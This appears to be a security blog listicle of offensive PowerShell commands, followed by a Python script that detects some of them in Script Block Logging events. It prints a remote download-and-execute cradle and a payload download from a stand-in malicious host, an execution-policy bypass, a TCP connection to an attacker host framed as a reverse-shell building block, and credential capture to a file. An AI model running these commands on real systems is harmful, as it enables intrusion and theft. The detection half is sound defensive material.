10 Essential PowerShell Commands for Offensive Security

  1. Invoke-WebRequest Download files from a URL. This can be used to pull malicious payloads.

    Invoke-WebRequest -Uri "http://malicious-site.com/payload.exe" -OutFile "payload.exe"
  2. Invoke-Expression (IEX) Execute strings or scripts, often used for fileless attacks by downloading and running scripts in memory.

    IEX (New-Object Net.WebClient).DownloadString('http://malicious-site.com/script.ps1')
  3. Set-ExecutionPolicy Change the execution policy to allow running scripts. Useful when bypassing script execution restrictions.

    Set-ExecutionPolicy Bypass -Scope Process -Force
  4. Get-WmiObject Gather detailed information about the target machine, including OS details, hardware specs, and processes.

    Get-WmiObject -Class Win32_OperatingSystem
  5. Get-Process List all running processes. Often used for identifying running services or processes that can be exploited.

    Get-Process
  6. Start-Process Execute a process on the target machine, useful for starting a new payload or running privilege escalation techniques.

    Start-Process "cmd.exe" -ArgumentList "/c whoami"
  7. New-Object System.Net.Sockets.TCPClient Open a raw TCP connection to a remote host. On its own this only connects; it is the building block on which a PowerShell reverse shell is assembled.

    $client = New-Object System.Net.Sockets.TCPClient("attacker-ip", 4444)
  8. Get-Content Read the contents of a file. It can be used for exfiltrating sensitive data.

    Get-Content "C:\sensitive-data.txt"
  9. Out-File Write data to a file. Useful for saving stolen credentials or logs.

    Get-Credential | Out-File "credentials.txt"
  10. Add-Type Compile C# source inline and load it into the current PowerShell session, enabling the use of advanced .NET functionality or custom code execution without a separate binary on disk.

Add-Type -TypeDefinition @"
public class Exploit {
    public static void Run() {
        // malicious code
    }
}
"@
[Exploit]::Run()
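Every command in this list leaves a recognisable footprint once PowerShell Script Block Logging is enabled (Event ID 4104, field ScriptBlockText). The Python script below is an added detection example, not part of the original list: it scans constructed 4104 records for the download cradle, execution-policy bypass, TcpClient and Add-Type patterns from items 2, 3, 7 and 10. The record ids, hosts and rule names are assumptions made for the demonstration.

```python
import re

# Each regex is applied to the ScriptBlockText of a PowerShell Event ID 4104
# record, which only exists when Script Block Logging is enabled.
FLAGS = re.IGNORECASE | re.DOTALL  # PowerShell is case-insensitive; blocks span lines

RULES = {
    # item 2 above: Invoke-Expression paired with a remote fetch, in either order
    "download-cradle": re.compile(
        r"\b(?:iex|invoke-expression)\b.*(?:downloadstring|invoke-webrequest|\biwr\b)"
        r"|(?:downloadstring|invoke-webrequest|\biwr\b).*\b(?:iex|invoke-expression)\b",
        FLAGS),
    # item 3: relaxing the execution policy from inside a script block
    "execution-policy-bypass": re.compile(
        r"set-executionpolicy\s+(?:bypass|unrestricted)", FLAGS),
    # item 7: a raw socket opened from a script block
    "tcp-client-shell": re.compile(
        r"new-object\s+(?:system\.)?net\.sockets\.tcpclient", FLAGS),
    # item 10: inline C# compilation
    "inline-csharp": re.compile(r"add-type\s+-typedefinition", FLAGS),
}

# Constructed 4104 records for the demonstration (not real telemetry; hosts and
# record ids are made up). Records 4 and 5 are ordinary admin use that the rules
# deliberately leave alone: a bare Invoke-WebRequest is far too common to alert on.
SAMPLE_EVENTS = [
    {"RecordId": 1, "ScriptBlockText":
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"},
    {"RecordId": 2, "ScriptBlockText": "Set-ExecutionPolicy Bypass -Scope Process -Force"},
    {"RecordId": 3, "ScriptBlockText":
        "$client = New-Object System.Net.Sockets.TCPClient('192.0.2.10', 4444)"},
    {"RecordId": 4, "ScriptBlockText": "Get-Process | Where-Object CPU -gt 100 | Out-File top.txt"},
    {"RecordId": 5, "ScriptBlockText":
        "Invoke-WebRequest -Uri 'https://example.invalid/tool.zip' -OutFile tool.zip"},
    {"RecordId": 6, "ScriptBlockText": 'Add-Type -TypeDefinition @"\npublic class Demo { }\n"@'},
]


def scan_script_blocks(events):
    """Return (RecordId, rule_name) for every rule each script block matches."""
    hits = []
    for ev in events:
        text = ev["ScriptBlockText"]
        hits.extend((ev["RecordId"], name) for name, rx in RULES.items() if rx.search(text))
    return hits


if __name__ == "__main__":
    for rid, rule in scan_script_blocks(SAMPLE_EVENTS):
        print(f"record {rid}: {rule}")
```

In production the same rules would run over Get-WinEvent output or a SIEM feed rather than the embedded list, and each hit should be correlated with the parent process and user before it becomes an alert.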

Note: The usage of these commands is for educational and authorized testing purposes only. Always ensure you have permission before engaging in offensive security activities.